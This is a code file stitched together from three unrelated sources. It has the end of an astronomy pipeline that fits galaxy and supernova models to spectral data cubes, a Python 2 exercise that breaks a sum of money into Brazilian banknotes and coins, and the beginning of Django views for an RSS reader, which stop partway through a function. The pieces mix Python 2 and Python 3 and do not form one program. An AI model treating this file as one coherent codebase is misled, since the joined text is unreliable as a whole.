    # assign some local variables for convenience
    refs = cfg["refs"]
    master_ref = cfg["master_ref"]
    if master_ref not in refs:
        # refs is a plain list parsed from JSON (no numpy .astype method),
        # so stringify the entries explicitly.
        raise ValueError("master ref choice must be one of the final refs (" +
                         " ".join(str(i) for i in refs) + ")")
    nonmaster_refs = [i for i in refs if i != master_ref]
    nonrefs = [i for i in range(nt) if i not in refs]

    # Ensure that all cubes have the same wavelengths.
    if not all(np.all(cubes[i].wave == wave) for i in range(1, nt)):
        raise ValueError("all data must have same wavelengths")

    # -------------------------------------------------------------------------
    # PSF for each observation

    logging.info("setting up PSF for all %d epochs", nt)
    psfs = [snfpsf(wave, cfg["psf_params"][i], cubes[i].header, args.psftype)
            for i in range(nt)]

    # -------------------------------------------------------------------------
    # Initialize all model parameters to be fit

    yctr0 = np.array(cfg["ycenters"])
    xctr0 = np.array(cfg["xcenters"])

    galaxy = np.zeros((nw, MODEL_SHAPE[0], MODEL_SHAPE[1]), dtype=np.float64)
    sn = np.zeros((nt, nw), dtype=np.float64)  # SN spectrum at each epoch
    skys = np.zeros((nt, nw), dtype=np.float64)  # Sky spectrum at each epoch
    yctr = yctr0.copy()
    xctr = xctr0.copy()
    snctr = (0., 0.)

    # For writing out to FITS
    modelwcs = {"CRVAL1": -SPAXEL_SIZE * (MODEL_SHAPE[0] - 1) / 2.,
                "CRPIX1": 1,
                "CDELT1": SPAXEL_SIZE,
                "CRVAL2": -SPAXEL_SIZE * (MODEL_SHAPE[1] - 1) / 2.,
                "CRPIX2": 1,
                "CDELT2": SPAXEL_SIZE,
                "CRVAL3": cubes[0].header["CRVAL3"],
                "CRPIX3": cubes[0].header["CRPIX3"],
                "CDELT3": cubes[0].header["CDELT3"]}

    # -------------------------------------------------------------------------
    # Position bounds

    # Bounds on data position: shape=(nt, 2)
    xctrbounds = np.vstack((xctr - POSITION_BOUND, xctr + POSITION_BOUND)).T
    yctrbounds = np.vstack((yctr - POSITION_BOUND, yctr + POSITION_BOUND)).T
    snctrbounds = (-POSITION_BOUND, POSITION_BOUND)

    # For data positions, check that bounds do not extend
    # past the edge of the model and adjust the minbound and maxbound.
    # This doesn't apply to SN position.
    gshape = galaxy.shape[1:3]  # model shape
    for i in range(nt):
        dshape = cubes[i].data.shape[1:3]
        (yminabs, ymaxabs), (xminabs, xmaxabs) = yxbounds(gshape, dshape)
        yctrbounds[i, 0] = max(yctrbounds[i, 0], yminabs)
        yctrbounds[i, 1] = min(yctrbounds[i, 1], ymaxabs)
        xctrbounds[i, 0] = max(xctrbounds[i, 0], xminabs)
        xctrbounds[i, 1] = min(xctrbounds[i, 1], xmaxabs)

    # -------------------------------------------------------------------------
    # Guess sky

    logging.info("guessing sky for all %d epochs", nt)
    for i, cube in enumerate(cubes):
        skys[i, :] = guess_sky(cube, npix=30)

    # -------------------------------------------------------------------------
    # Regularization penalty parameters

    # Calculate rough average galaxy spectrum from all final refs.
    spectra = np.zeros((len(refs), len(wave)), dtype=np.float64)
    for j, i in enumerate(refs):
        avg_spec = np.average(cubes[i].data, axis=(1, 2)) - skys[i]
        # binned_statistic requires an integer bin count; plain '/' would
        # give a float here because true division is in effect.
        mean_spec, bins, bn = scipy.stats.binned_statistic(wave, avg_spec,
                                                           bins=len(wave) // 10)
        spectra[j] = np.interp(wave, bins[:-1] + np.diff(bins)[0]/2.,
                               mean_spec)
    mean_gal_spec = np.average(spectra, axis=0)
    # Ensure that there won't be any negative or tiny values in mean:
    mean_floor = 0.1 * np.median(mean_gal_spec)
    mean_gal_spec[mean_gal_spec < mean_floor] = mean_floor

    galprior = np.zeros((nw, MODEL_SHAPE[0], MODEL_SHAPE[1]), dtype=np.float64)

    regpenalty = RegularizationPenalty(galprior, mean_gal_spec, args.mu_xy,
                                       args.mu_wave)

    tsteps["setup"] = datetime.now()

    # -------------------------------------------------------------------------
    # Fit just the galaxy model to just the master ref.

    data = cubes[master_ref].data - skys[master_ref, :, None, None]
    weight = cubes[master_ref].weight

    logging.info("fitting galaxy to master ref [%d]", master_ref)
    galaxy = fit_galaxy_single(galaxy, data, weight,
                               (yctr[master_ref], xctr[master_ref]),
                               psfs[master_ref], regpenalty, LBFGSB_FACTOR)

    if args.diagdir:
        fname = os.path.join(args.diagdir, 'step1.fits')
        write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                      yctrbounds, xctrbounds, cubes, psfs, modelwcs, fname)

    tsteps["fit galaxy to master ref"] = datetime.now()

    # -------------------------------------------------------------------------
    # Fit the positions of the other final refs
    #
    # Here we only use spaxels where the *model* has significant flux.
    # We define "significant" as some number of median absolute deviations
    # (MAD) above the minimum flux in the model. We (temporarily) set the
    # weight of "insignificant" spaxels to zero during this process, then
    # restore the original weight after we're done.
    #
    # If there are less than 20 "significant" spaxels, we do not attempt to
    # fit the position, but simply leave it as is.

    logging.info("fitting position of non-master refs %s", nonmaster_refs)
    for i in nonmaster_refs:
        cube = cubes[i]

        # Evaluate galaxy on this epoch for purpose of masking spaxels.
        gal = psfs[i].evaluate_galaxy(galaxy, (cube.ny, cube.nx),
                                      (yctr[i], xctr[i]))

        # Set weight of low-valued spaxels to zero.
        gal2d = gal.sum(axis=0)  # Sum of gal over wavelengths
        mad = np.median(np.abs(gal2d - np.median(gal2d)))
        mask = gal2d > np.min(gal2d) + MIN_NMAD * mad
        if mask.sum() < 20:
            continue

        weight = cube.weight * mask[None, :, :]

        fctr, fsky = fit_position_sky(galaxy, cube.data, weight,
                                      (yctr[i], xctr[i]), psfs[i],
                                      (yctrbounds[i], xctrbounds[i]))
        yctr[i], xctr[i] = fctr
        skys[i, :] = fsky

    tsteps["fit positions of other refs"] = datetime.now()

    # -------------------------------------------------------------------------
    # Redo model fit, this time including all final refs.

    datas = [cubes[i].data for i in refs]
    weights = [cubes[i].weight for i in refs]
    ctrs = [(yctr[i], xctr[i]) for i in refs]
    psfs_refs = [psfs[i] for i in refs]
    logging.info("fitting galaxy to all refs %s", refs)
    galaxy, fskys = fit_galaxy_sky_multi(galaxy, datas, weights, ctrs,
                                         psfs_refs, regpenalty, LBFGSB_FACTOR)

    # put fitted skys back in `skys`
    for i, j in enumerate(refs):
        skys[j, :] = fskys[i]

    if args.diagdir:
        fname = os.path.join(args.diagdir, 'step2.fits')
        write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                      yctrbounds, xctrbounds, cubes, psfs, modelwcs, fname)

    tsteps["fit galaxy to all refs"] = datetime.now()

    # -------------------------------------------------------------------------
    # Fit position of data and SN in non-references
    #
    # Now we think we have a good galaxy model. We fix this and fit
    # the relative position of the remaining epochs (which presumably
    # all have some SN light). We simultaneously fit the position of
    # the SN itself.

    logging.info("fitting position of all %d non-refs and SN position",
                 len(nonrefs))
    if len(nonrefs) > 0:
        datas = [cubes[i].data for i in nonrefs]
        weights = [cubes[i].weight for i in nonrefs]
        psfs_nonrefs = [psfs[i] for i in nonrefs]
        fyctr, fxctr, snctr, fskys, fsne = fit_position_sky_sn_multi(
            galaxy, datas, weights, yctr[nonrefs], xctr[nonrefs],
            snctr, psfs_nonrefs, LBFGSB_FACTOR, yctrbounds[nonrefs],
            xctrbounds[nonrefs], snctrbounds)

        # put fitted results back in parameter lists.
        yctr[nonrefs] = fyctr
        xctr[nonrefs] = fxctr
        for i, j in enumerate(nonrefs):
            skys[j, :] = fskys[i]
            sn[j, :] = fsne[i]

    tsteps["fit positions of nonrefs & SN"] = datetime.now()

    # -------------------------------------------------------------------------
    # optional step(s)

    if args.refitgal and len(nonrefs) > 0:

        if args.diagdir:
            fname = os.path.join(args.diagdir, 'step3.fits')
            write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                          yctrbounds, xctrbounds, cubes, psfs, modelwcs, fname)

        # ---------------------------------------------------------------------
        # Redo fit of galaxy, using ALL epochs, including ones with SN
        # light.  We hold the SN "fixed" simply by subtracting it from the
        # data and fitting the remainder.
        #
        # This is slightly dangerous: any errors in the original SN
        # determination, whether due to an incorrect PSF or ADR model
        # or errors in the galaxy model will result in residuals. The
        # galaxy model will then try to compensate for these.
        #
        # We should look at the galaxy model at the position of the SN
        # before and after this step to see if there is a bias towards
        # the galaxy flux increasing.

        logging.info("fitting galaxy using all %d epochs", nt)
        datas = [cube.data for cube in cubes]
        weights = [cube.weight for cube in cubes]
        ctrs = [(yctr[i], xctr[i]) for i in range(nt)]

        # subtract SN from non-ref cubes.
        for i in nonrefs:
            s = psfs[i].point_source(snctr, datas[i].shape[1:3], ctrs[i])
            # do *not* use in-place operation (-=) here!
            datas[i] = cubes[i].data - sn[i, :, None, None] * s

        galaxy, fskys = fit_galaxy_sky_multi(galaxy, datas, weights, ctrs,
                                             psfs, regpenalty, LBFGSB_FACTOR)
        for i in range(nt):
            skys[i, :] = fskys[i]  # put fitted skys back in skys

        if args.diagdir:
            fname = os.path.join(args.diagdir, 'step4.fits')
            write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                          yctrbounds, xctrbounds, cubes, psfs, modelwcs, fname)

        # ---------------------------------------------------------------------
        # Repeat step before last: fit position of data and SN in
        # non-references

        logging.info("re-fitting position of all %d non-refs and SN position",
                     len(nonrefs))
        if len(nonrefs) > 0:
            datas = [cubes[i].data for i in nonrefs]
            weights = [cubes[i].weight for i in nonrefs]
            psfs_nonrefs = [psfs[i] for i in nonrefs]
            fyctr, fxctr, snctr, fskys, fsne = fit_position_sky_sn_multi(
                galaxy, datas, weights, yctr[nonrefs], xctr[nonrefs],
                snctr, psfs_nonrefs, LBFGSB_FACTOR, yctrbounds[nonrefs],
                xctrbounds[nonrefs], snctrbounds)

            # put fitted results back in parameter lists.
            yctr[nonrefs] = fyctr
            xctr[nonrefs] = fxctr
            for i, j in enumerate(nonrefs):
                skys[j, :] = fskys[i]
                sn[j, :] = fsne[i]

    # -------------------------------------------------------------------------
    # Write results

    logging.info("writing results to %s", args.outfile)
    write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                  yctrbounds, xctrbounds, cubes, psfs, modelwcs, args.outfile)

    # time info
    logging.info("step times:")
    maxlen = max(len(key) for key in tsteps)
    fmtstr = "        %2dm%02ds - %-" + str(maxlen) + "s"
    tprev = tstart
    for key, tstep in tsteps.items():
        t = (tstep - tprev).seconds
        logging.info(fmtstr, t//60, t%60, key)
        tprev = tstep

    tfinish = datetime.now()
    logging.info("finished at %s", tfinish.strftime("%Y-%m-%d %H:%M:%S"))
    t = (tfinish - tstart).seconds
    logging.info("took %3dm%2ds", t // 60, t % 60)

    return 0


def cubefit_subtract(argv=None):
    """Command-line entry point (``cubefit-subtract``).

    Subtracts the cubefit galaxy model from each input data cube, writing
    the results to the "outnames" files from the configuration, and writes
    each epoch's fitted SN spectrum to the "sn_outnames" files.
    Returns 0 on success.
    """
    DESCRIPTION = \
"""Subtract model determined by cubefit from the original data.

The "outnames" key in the supplied configuration file is used to
determine the output FITS file names. The input FITS header is passed
unaltered to the output file, with the following additions:
(1) A `HISTORY` entry. (2) `CBFT_SNX` and `CBFT_SNY` records giving
the cubefit-determined position of the SN relative to the center of
the data array (at the reference wavelength).

This script also writes fitted SN spectra to individual FITS files.
The "sn_outnames" configuration field determines the output filenames.
"""

    # Local imports: fitsio (and shutil) are only needed by this entry point.
    import shutil

    import fitsio

    prog_name = "cubefit-subtract"
    prog_name_ver = "{} v{}".format(prog_name, __version__)
    parser = ArgumentParser(prog=prog_name, description=DESCRIPTION)
    parser.add_argument("configfile", help="configuration file name "
                        "(JSON format), same as cubefit input.")
    parser.add_argument("resultfile", help="Result FITS file from cubefit")
    parser.add_argument("--dataprefix", default="",
                        help="path prepended to data file names; default is "
                        "empty string")
    parser.add_argument("--outprefix", default="",
                        help="path prepended to output file names; default is "
                        "empty string")
    args = parser.parse_args(argv)

    setup_logging("info")

    # get input & output filenames
    with open(args.configfile) as f:
        cfg = json.load(f)
    fnames = [os.path.join(args.dataprefix, fname)
              for fname in cfg["filenames"]]
    outfnames = [os.path.join(args.outprefix, fname)
                 for fname in cfg["outnames"]]

    # load results
    results = read_results(args.resultfile)
    epochs = results["epochs"]
    sny, snx = results["snctr"]
    if not len(epochs) == len(fnames) == len(outfnames):
        raise RuntimeError("number of epochs in result file not equal to "
                           "number of input and output files in config file")

    # subtract and write out.
    for fname, outfname, epoch in zip(fnames, outfnames, epochs):
        logging.info("writing %s", outfname)
        # Copy the input file first so the output keeps the original
        # header; then modify the copy's primary HDU in place.
        shutil.copy(fname, outfname)
        f = fitsio.FITS(outfname, "rw")
        data = f[0].read()
        # NOTE(review): epoch["galeval"] appears to be the galaxy model
        # evaluated on this epoch's data grid — confirm in io/read_results.
        data -= epoch["galeval"]
        f[0].write(data)
        f[0].write_history("galaxy subtracted by " + prog_name_ver)
        # SN offsets relative to the array center, in spaxels.
        f[0].write_key("CBFT_SNX", snx - epoch['xctr'],
                       comment="SN x offset from center at {:.0f} A [spaxels]"
                       .format(REFWAVE))
        f[0].write_key("CBFT_SNY", sny - epoch['yctr'],
                       comment="SN y offset from center at {:.0f} A [spaxels]"
                       .format(REFWAVE))
        f.close()

    # output SN spectra to separate files.
    # Wavelength WCS: the cube's 3rd axis becomes the spectrum's 1st axis.
    sn_outnames = [os.path.join(args.outprefix, fname)
                   for fname in cfg["sn_outnames"]]
    header = {"CRVAL1": results["header"]["CRVAL3"],
              "CRPIX1": results["header"]["CRPIX3"],
              "CDELT1": results["header"]["CDELT3"]}
    for outfname, epoch in zip(sn_outnames, epochs):
        logging.info("writing %s", outfname)
        if os.path.exists(outfname):  # avoid warning from clobber=True
            os.remove(outfname)
        with fitsio.FITS(outfname, "rw") as f:
            f.write(epoch["sn"], extname="sn", header=header)
            f[0].write_history("created by " + prog_name_ver)

    return 0


def cubefit_plot(argv=None):
    """Command-line entry point (``cubefit-plot``).

    Reads the same configuration/result files as ``cubefit`` and writes
    PNG figures (time series, optional per-epoch and SN-spectrum plots)
    under the given output prefix. Returns 0 on success.
    """
    DESCRIPTION = """Plot results and diagnostics from cubefit"""

    from .plotting import plot_timeseries, plot_epoch, plot_sn, plot_adr

    # Arguments mirror cubefit, plus an output prefix.
    parser = ArgumentParser(prog="cubefit-plot", description=DESCRIPTION)
    parser.add_argument("configfile", help="configuration filename")
    parser.add_argument("resultfile", help="Result filename from cubefit")
    parser.add_argument("outprefix", help="output prefix")
    parser.add_argument("--dataprefix", default="",
                        help="path prepended to data file names; default is "
                        "empty string")
    parser.add_argument('-b', '--band', default=None, dest='band',
                        help='timeseries band (U, B, V). '
                        'Default is a 1000 A wide band in middle of cube.')
    parser.add_argument('--idrfiles', nargs='+', default=None,
                        help='Prefix of IDR. If given, the cubefit SN '
                        'spectra are plotted against the production values.')
    parser.add_argument("--diagdir", default=None,
                        help="If given, read intermediate diagnostic "
                        "results from this directory and include in plot(s)")
    parser.add_argument("--plotepochs", default=False, action="store_true",
                        help="Make diagnostic plots for each epoch")
    args = parser.parse_args(argv)

    # Load the data cubes named in the configuration file.
    with open(args.configfile) as cfgfile:
        cfg = json.load(cfgfile)
    cubes = [read_datacube(os.path.join(args.dataprefix, fname), scale=False)
             for fname in cfg["filenames"]]

    results = OrderedDict()

    # Intermediate per-step diagnostic results, if available.
    if args.diagdir is not None:
        for fname in sorted(glob.glob(os.path.join(args.diagdir,
                                                   "step*.fits"))):
            stepname = os.path.basename(fname).split(".")[0]
            results[stepname] = read_results(fname)

    # Final result (don't fail if not available).
    if os.path.exists(args.resultfile):
        results["final"] = read_results(args.resultfile)

    # The time-series plot is always produced.
    plot_timeseries(cubes, results, band=args.band,
                    fname=(args.outprefix + '_timeseries.png'))

    # Wave slices plus SN/galaxy/sky spectra, one figure per epoch.
    if args.plotepochs and 'final' in results:
        for i_t, cube in enumerate(cubes):
            plot_epoch(cube, results['final']['epochs'][i_t],
                       fname=(args.outprefix + '_epoch%02d.png' % i_t))

    # Fitted SN spectra compared with IDR production spectra.
    if args.idrfiles is not None and 'final' in results:
        plot_sn(cfg['filenames'], results['final']['epochs']['sn'],
                results['final']['wave'], args.idrfiles,
                args.outprefix + '_sn.png')

    # ADR x/y versus wavelength plot intentionally disabled
    # (contains no interesting information).
    #plot_adr(cubes, cubes[0].wave, fname=(args.outprefix + '_adr.png'))

    return 0

# -*- coding: utf-8 -*-


def calc_note(count, value):
    """Print how many banknotes of `value` fit in `count` and return the rest.

    :param count: remaining amount of money (may be a float).
    :param value: banknote denomination (positive integer).
    :return: `count` minus the banknotes handed out.
    """
    qnt = 0
    if count >= value:
        # Floor division: '/' would yield a fractional note count under
        # Python 3 and corrupt the returned remainder.
        qnt = int(count) // value
    print('%d nota(s) de R$ %d.00' % (qnt, value))
    return count - qnt * value


# Read a monetary amount and decompose it greedily into Brazilian
# banknotes (NOTAS) and coins (MOEDAS), largest denomination first.
# NOTE: Python 2 script (raw_input / print statements).
n = float(raw_input())

print 'NOTAS:'
# Each calc_note call prints the banknote count for one denomination
# and returns the remaining amount.
n = calc_note(n, 100)
n = calc_note(n, 50)
n = calc_note(n, 20)
n = calc_note(n, 10)
n = calc_note(n, 5)
n = calc_note(n, 2)
print 'MOEDAS:'
# Whole reals left over become R$ 1.00 coins.
print '%d moeda(s) de R$ 1.00' % int(n)
n -= int(n)
# Fractional part: 0.50, 0.25 and 0.10 coins in turn ('%d' truncates
# the float quotient to the coin count).
m50 = n / 0.50
print '%d moeda(s) de R$ 0.50' % m50
n -= int(m50) * 0.50
m25 = n / 0.25
print '%d moeda(s) de R$ 0.25' % m25
n -= int(m25) * 0.25
m10 = n / 0.10
print '%d moeda(s) de R$ 0.10' % m10
n -= int(m10) * 0.10
# round() guards against accumulated float error when deciding whether
# a 0.05 coin fits; whatever remains is reported as 0.01 coins.
if round(n, 2) >= 0.05:
    print '1 moeda(s) de R$ 0.05'
    m1 = (n - 0.05) * 100
else:
    print '0 moeda(s) de R$ 0.05'
    m1 = round(n, 2) * 100
if round(m1, 0):
    print '%.0f moeda(s) de R$ 0.01' % m1
else:
    print '0 moeda(s) de R$ 0.01'

import datetime
import time
import boto
import redis
import requests
import random
import zlib
from django.shortcuts import get_object_or_404
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.template.loader import render_to_string
from django.db import IntegrityError
from django.db.models import Q
from django.views.decorators.cache import never_cache
from django.core.urlresolvers import reverse
from django.contrib.auth import login as login_user
from django.contrib.auth import logout as logout_user
from django.contrib.auth.models import User
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404
from django.conf import settings
from django.core.mail import mail_admins
from django.core.validators import email_re
from django.core.mail import EmailMultiAlternatives
from django.contrib.sites.models import Site
from django.utils import feedgenerator
from mongoengine.queryset import OperationError
from mongoengine.queryset import NotUniqueError
from apps.recommendations.models import RecommendedFeed
from apps.analyzer.models import MClassifierTitle, MClassifierAuthor, MClassifierFeed, MClassifierTag
from apps.analyzer.models import apply_classifier_titles, apply_classifier_feeds
from apps.analyzer.models import apply_classifier_authors, apply_classifier_tags
from apps.analyzer.models import get_classifiers_for_user, sort_classifiers_by_feed
from apps.profile.models import Profile
from apps.reader.models import UserSubscription, UserSubscriptionFolders, RUserStory, Feature
from apps.reader.forms import SignupForm, LoginForm, FeatureForm
from apps.rss_feeds.models import MFeedIcon, MStarredStoryCounts
from apps.search.models import MUserSearch
from apps.statistics.models import MStatistics
# from apps.search.models import SearchStarredStory
try:
    from apps.rss_feeds.models import Feed, MFeedPage, DuplicateFeed, MStory, MStarredStory
except:
    pass
from apps.social.models import MSharedStory, MSocialProfile, MSocialServices
from apps.social.models import MSocialSubscription, MActivity, MInteraction
from apps.categories.models import MCategory
from apps.social.views import load_social_page
from apps.rss_feeds.tasks import ScheduleImmediateFetches
from utils import json_functions as json
from utils.user_functions import get_user, ajax_login_required
from utils.feed_functions import relative_timesince
from utils.story_functions import format_story_link_date__short
from utils.story_functions import format_story_link_date__long
from utils.story_functions import strip_tags
from utils import log as logging
from utils.view_functions import get_argument_or_404, render_to, is_true
from utils.view_functions import required_params
from utils.ratelimit import ratelimit
from vendor.timezones.utilities import localtime_for_timezone


BANNED_URLS = [
    "brentozar.com",
]

@never_cache
@render_to('reader/dashboard.xhtml')
def index(request, **kwargs):
    """Site root: route to a social page, the welcome page, or the dashboard.

    GET requests on a user subdomain (anything other than dev/www/debug;
    `request.subdomain` is presumably set by middleware — confirm) are
    served that user's social page; an unknown subdomain redirects to the
    main domain's index. Otherwise anonymous visitors get the welcome
    page and logged-in users their dashboard.
    """
    if request.method == "GET" and request.subdomain and request.subdomain not in ['dev', 'www', 'debug']:
        username = request.subdomain
        try:
            # Keep only the leading label, e.g. "user.extra" -> "user".
            if '.' in username:
                username = username.split('.')[0]
            user = User.objects.get(username__iexact=username)
        except User.DoesNotExist:
            # Unknown subdomain: bounce to the main site's index.
            return HttpResponseRedirect('http://%s%s' % (
                Site.objects.get_current().domain,
                reverse('index')))
        return load_social_page(request, user_id=user.pk, username=request.subdomain, **kwargs)

    if request.user.is_anonymous():
        return welcome(request, **kwargs)
    else:
        return dashboard(request, **kwargs)

def dashboard(request, **kwargs):
    """Build the dashboard context for a logged-in user.

    Returns a (context, template) tuple, consumed by the @render_to
    decorator on index().
    """
    user = request.user
    feed_count = UserSubscription.objects.filter(user=request.user).count()
    recommended_feeds = RecommendedFeed.objects.filter(
        is_public=True,
        approved_date__lte=datetime.datetime.now()).select_related('feed')[:2]

    # Staff members also see feeds awaiting moderation.
    unmoderated_feeds = []
    if user.is_staff:
        unmoderated_feeds = RecommendedFeed.objects.filter(
            is_public=False,
            declined_date__isnull=True).select_related('feed')[:2]

    statistics = MStatistics.all()
    social_profile = MSocialProfile.get_user(user.pk)

    # One-shot session flag: consume it so the import is triggered once.
    start_import_from_google_reader = request.session.get(
        'import_from_google_reader', False)
    if start_import_from_google_reader:
        del request.session['import_from_google_reader']

    # Inactive accounts are sent to the stripe form instead of the
    # dashboard (presumably payment is required — confirm).
    if not user.is_active:
        url = "https://%s%s" % (Site.objects.get_current().domain,
                                reverse('stripe-form'))
        return HttpResponseRedirect(url)

    logging.user(request, "~FBLoading dashboard")

    return {
        'user_profile': user.profile,
        'feed_count': feed_count,
        'account_images': range(1, 4),
        'recommended_feeds': recommended_feeds,
        'unmoderated_feeds': unmoderated_feeds,
        'statistics': statistics,
        'social_profile': social_profile,
        'start_import_from_google_reader': start_import_from_google_reader,
        'debug': settings.DEBUG,
    }, "reader/dashboard.xhtml"
    
def welcome(request, **kwargs):
    """Build the template context for the logged-out landing page.

    On POST, re-binds only the form that was actually submitted (login or
    signup) so its validation errors are rendered; the other form stays blank.
    """
    user = get_user(request)
    statistics = MStatistics.all()
    social_profile = MSocialProfile.get_user(user.pk)

    login_form = LoginForm(prefix='login')
    signup_form = SignupForm(prefix='signup')
    if request.method == "POST":
        if request.POST.get('submit', '').startswith('log'):
            login_form = LoginForm(request.POST, prefix='login')
        else:
            signup_form = SignupForm(request.POST, prefix='signup')

    logging.user(request, "~FBLoading welcome")

    return {
        'user_profile'      : hasattr(user, 'profile') and user.profile,
        'login_form'        : login_form,
        'signup_form'       : signup_form,
        'statistics'        : statistics,
        'social_profile'    : social_profile,
        'post_request'      : request.method == 'POST',
    }, "reader/welcome.xhtml"

@never_cache
def login(request):
    """Authenticate via the login form.

    API clients receive a JSON {code, message} payload; browser clients are
    redirected to the index on success, or shown the index page (with the
    form's first error message discarded into `message`) on failure.
    """
    code, message = -1, ""

    if request.method == "POST":
        form = LoginForm(request.POST, prefix='login')
        if not form.is_valid():
            # Surface only the first validation error.
            message = form.errors.items()[0][1][0]
        else:
            user = form.get_user()
            login_user(request, user)
            if not request.POST.get('api'):
                logging.user(user, "~FG~BBLogin~FW")
                return HttpResponseRedirect(reverse('index'))
            logging.user(user, "~FG~BB~SKiPhone Login~FW")
            code = 1

    if request.POST.get('api'):
        return HttpResponse(json.encode(dict(code=code, message=message)),
                            mimetype='application/json')
    return index(request)
    
@never_cache
def signup(request):
    """Create a new account from the signup form and log the user in.

    Newly created inactive accounts (paid-only signups) are redirected to
    the payment form; everyone else falls through to the index page.
    """
    if request.method != "POST":
        return index(request)

    form = SignupForm(prefix='signup', data=request.POST)
    if form.is_valid():
        new_user = form.save()
        login_user(request, new_user)
        logging.user(new_user, "~FG~SB~BBNEW SIGNUP: ~FW%s" % new_user.email)
        if not new_user.is_active:
            destination = "https://%s%s" % (Site.objects.get_current().domain,
                                            reverse('stripe-form'))
            return HttpResponseRedirect(destination)

    return index(request)
        
@never_cache
def logout(request):
    """Log the user out; JSON ack for API clients, redirect for browsers."""
    logging.user(request, "~FG~BBLogout~FW")
    logout_user(request)

    if not request.GET.get('api'):
        return HttpResponseRedirect(reverse('index'))
    return HttpResponse(json.encode(dict(code=1)), mimetype='application/json')

def autologin(request, username, secret):
    """One-click login via a per-user secret token embedded in a URL.

    Both the username and the secret token must match an existing Profile;
    otherwise the request is forbidden. On success, redirects to `next`
    (as a path, or passed along as ?next= when it isn't one) or the index.
    """
    next_url = request.GET.get('next', '')

    if not (username and secret):
        return HttpResponseForbidden()

    matches = Profile.objects.filter(user__username=username, secret_token=secret)
    if not matches:
        return HttpResponseForbidden()

    user = matches[0].user
    # login_user() requires a backend attribute on the user object.
    user.backend = settings.AUTHENTICATION_BACKENDS[0]
    login_user(request, user)
    logging.user(user, "~FG~BB~SKAuto-Login. Next stop: %s~FW" % (next_url if next_url else 'Homepage',))

    if next_url and not next_url.startswith('/'):
        # Not a path: hand it to the front-end router as a query param.
        return HttpResponseRedirect(reverse('index') + '?next=' + next_url)
    elif next_url:
        return HttpResponseRedirect(next_url)
    return HttpResponseRedirect(reverse('index'))
    
@ratelimit(minutes=1, requests=24)
@never_cache
@json.json_view
def load_feeds(request):
    """Return the user's feeds, folders, social subs, and starred counts.

    Main payload behind the feed list. Honors query params:
    `flat` (delegate to load_feeds_flat), `include_favicons`,
    `update_counts` (recalculate stale unread counts), and `v`
    (payload version: v2 returns feeds as a list instead of a dict).
    """
    user             = get_user(request)
    feeds            = {}
    include_favicons = request.REQUEST.get('include_favicons', False)
    flat             = request.REQUEST.get('flat', False)
    update_counts    = request.REQUEST.get('update_counts', False)
    version          = int(request.REQUEST.get('v', 1))
    
    # Query params arrive as strings; normalize an explicit 'false' to False.
    if include_favicons == 'false': include_favicons = False
    if update_counts == 'false': update_counts = False
    if flat == 'false': flat = False
    
    if flat: return load_feeds_flat(request)
    
    try:
        folders = UserSubscriptionFolders.objects.get(user=user)
    except UserSubscriptionFolders.DoesNotExist:
        # Brand-new user with no folder structure yet: empty payload.
        data = dict(feeds=[], folders=[])
        return data
    except UserSubscriptionFolders.MultipleObjectsReturned:
        # Duplicate folder rows: drop all but the first, then re-fetch.
        UserSubscriptionFolders.objects.filter(user=user)[1:].delete()
        folders = UserSubscriptionFolders.objects.get(user=user)
    
    user_subs = UserSubscription.objects.select_related('feed').filter(user=user)
    
    day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
    scheduled_feeds = []
    for sub in user_subs:
        pk = sub.feed_id
        if update_counts and sub.needs_unread_recalc:
            sub.calculate_feed_scores(silent=True)
        feeds[pk] = sub.canonical(include_favicon=include_favicons)
        
        # Collect stale or broken feeds for an immediate refetch below.
        if not sub.active: continue
        if not sub.feed.active and not sub.feed.has_feed_exception:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.active_subscribers <= 0:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.next_scheduled_update < day_ago:
            scheduled_feeds.append(sub.feed.pk)
    
    if len(scheduled_feeds) > 0 and request.user.is_authenticated():
        logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." % 
                     len(scheduled_feeds))
        ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk))

    starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
    # Per-tag counts exist but no total: fall back to a direct count.
    if not starred_count and len(starred_counts):
        starred_count = MStarredStory.objects(user_id=user.pk).count()
    
    social_params = {
        'user_id': user.pk,
        'include_favicon': include_favicons,
        'update_counts': update_counts,
    }
    social_feeds = MSocialSubscription.feeds(**social_params)
    social_profile = MSocialProfile.profile(user.pk)
    social_services = MSocialServices.profile(user.pk)
    
    # Offer category suggestions to users with no subscriptions yet.
    categories = None
    if not user_subs:
        categories = MCategory.serialize()

    logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB feeds/socials%s" % (
            len(feeds.keys()), len(social_feeds), '. ~FCUpdating counts.' if update_counts else ''))

    data = {
        'feeds': feeds.values() if version == 2 else feeds,
        'social_feeds': social_feeds,
        'social_profile': social_profile,
        'social_services': social_services,
        'user_profile': user.profile,
        "is_staff": user.is_staff,
        'folders': json.decode(folders.folders),
        'starred_count': starred_count,
        'starred_counts': starred_counts,
        'categories': categories
    }
    return data

@json.json_view
def load_feed_favicons(request):
    """Return {feed_id: favicon_data} for the requested feed ids.

    When no `feed_ids` are given, defaults to every feed in the user's
    active subscriptions.
    """
    user = get_user(request)
    feed_ids = request.REQUEST.getlist('feed_ids')

    if not feed_ids:
        active_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
        feed_ids = [sub['feed__pk'] for sub in active_subs.values('feed__pk')]

    return dict((icon.feed_id, icon.data)
                for icon in MFeedIcon.objects(feed_id__in=feed_ids))

def load_feeds_flat(request):
    """Flattened variant of load_feeds, used primarily by mobile clients.

    Folders are returned as a flat mapping rather than a nested tree, and
    only active subscriptions are included (auto-activating them when a
    user has folders but zero active subs).
    """
    user = request.user
    include_favicons = is_true(request.REQUEST.get('include_favicons', False))
    update_counts    = is_true(request.REQUEST.get('update_counts', True))
    
    feeds = {}
